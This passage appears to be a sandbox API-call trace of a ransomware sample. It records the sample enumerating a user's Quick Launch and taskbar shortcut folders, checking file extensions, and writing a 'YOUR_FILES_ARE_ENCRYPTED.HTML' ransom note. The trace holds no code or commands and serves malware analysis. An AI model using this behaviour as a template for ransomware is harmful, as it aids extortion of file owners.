RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.268] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0165.268] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0165.268] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.268] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.268] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.269] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 92 [0165.269] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.269] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.269] lstrlenW (lpString=".ini") returned 4 [0165.269] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.269] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaab38e80, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaab38e80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaab38e80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x585, dwReserved0=0x0, dwReserved1=0x60, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0165.269] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 117 [0165.269] lstrcmpW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.269] PathFindExtensionW (pszPath="Launch Internet Explorer Browser.lnk") returned=".lnk" [0165.269] lstrlenW (lpString=".lnk") returned 4 [0165.269] PathFindExtensionW (pszPath="Launch Internet Explorer Browser.lnk") returned=".lnk" [0165.269] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b00c220, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x2b00c220, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x2b032380, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x4ac, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0165.269] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 102 [0165.269] lstrcmpW (lpString1="Microsoft Outlook.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.269] PathFindExtensionW (pszPath="Microsoft Outlook.lnk") returned=".lnk" [0165.269] lstrlenW (lpString=".lnk") returned 4 [0165.269] PathFindExtensionW (pszPath="Microsoft Outlook.lnk") returned=".lnk" [0165.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd36d1b2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x60, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0165.270] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 98 [0165.270] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.270] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0165.270] lstrlenW (lpString=".lnk") returned 4 [0165.270] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0165.270] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0165.270] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 92 [0165.270] GetProcessHeap () returned 0x270000 [0165.270] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.271] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0165.271] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0165.271] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.272] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.272] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0165.272] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 113 [0165.272] GetProcessHeap () returned 0x270000 [0165.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.275] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0165.275] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0165.275] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0165.277] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.277] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.277] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0165.277] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0165.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0165.281] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0165.284] CloseHandle (hObject=0x58c) returned 1 [0165.285] GetProcessHeap () returned 0x270000 [0165.287] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.287] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0165.287] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 100 [0165.287] GetProcessHeap () returned 0x270000 [0165.287] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.287] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0165.287] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0165.287] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0165.287] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xa36d44f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa36d44f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.288] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd64b9fd0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0165.288] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 112 [0165.288] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.288] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.288] lstrlenW (lpString=".ini") returned 4 [0165.288] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0165.288] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33423f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa33423f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b93dbf0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x926, dwReserved0=0x0, dwReserved1=0x60, cFileName="Excel 2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0165.288] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned 115 [0165.288] lstrcmpW (lpString1="Excel 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.288] PathFindExtensionW (pszPath="Excel 2016.lnk") returned=".lnk" [0165.288] lstrlenW (lpString=".lnk") returned 4 [0165.288] PathFindExtensionW (pszPath="Excel 2016.lnk") returned=".lnk" [0165.288] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd646dd10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd646dd10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6101d70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0165.288] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 126 [0165.288] lstrcmpW (lpString1="Internet Explorer (2).lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.288] PathFindExtensionW (pszPath="Internet Explorer (2).lnk") returned=".lnk" [0165.289] lstrlenW (lpString=".lnk") returned 4 [0165.289] PathFindExtensionW (pszPath="Internet Explorer (2).lnk") returned=".lnk" [0165.289] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a01436b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0165.289] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk") returned 122 [0165.289] lstrcmpW (lpString1="Internet Explorer.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.289] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0165.289] lstrlenW (lpString=".lnk") returned 4 [0165.289] PathFindExtensionW (pszPath="Internet Explorer.lnk") returned=".lnk" [0165.289] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3472ef0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3472ef0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b989eb0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x912, dwReserved0=0x0, dwReserved1=0x60, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0165.289] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned 117 [0165.289] lstrcmpW (lpString1="OneNote 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.289] PathFindExtensionW (pszPath="OneNote 2016.lnk") returned=".lnk" [0165.289] lstrlenW (lpString=".lnk") returned 4 [0165.289] PathFindExtensionW (pszPath="OneNote 2016.lnk") returned=".lnk" [0165.289] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa350b470, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa350b470, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b989eb0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x920, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0165.289] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned 117 [0165.289] lstrcmpW (lpString1="Outlook 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.289] PathFindExtensionW (pszPath="Outlook 2016.lnk") returned=".lnk" [0165.290] lstrlenW (lpString=".lnk") returned 4 [0165.290] PathFindExtensionW (pszPath="Outlook 2016.lnk") returned=".lnk" [0165.290] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa35a39f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa35a39f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x9b989eb0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x94b, dwReserved0=0x0, dwReserved1=0x60, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0165.290] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned 120 [0165.290] lstrcmpW (lpString1="PowerPoint 2016.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.290] PathFindExtensionW (pszPath="PowerPoint 2016.lnk") returned=".lnk" [0165.290] lstrlenW (lpString=".lnk") returned 4 [0165.290] PathFindExtensionW (pszPath="PowerPoint 2016.lnk") returned=".lnk" [0165.290] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6493e70, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6493e70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd34e2948, 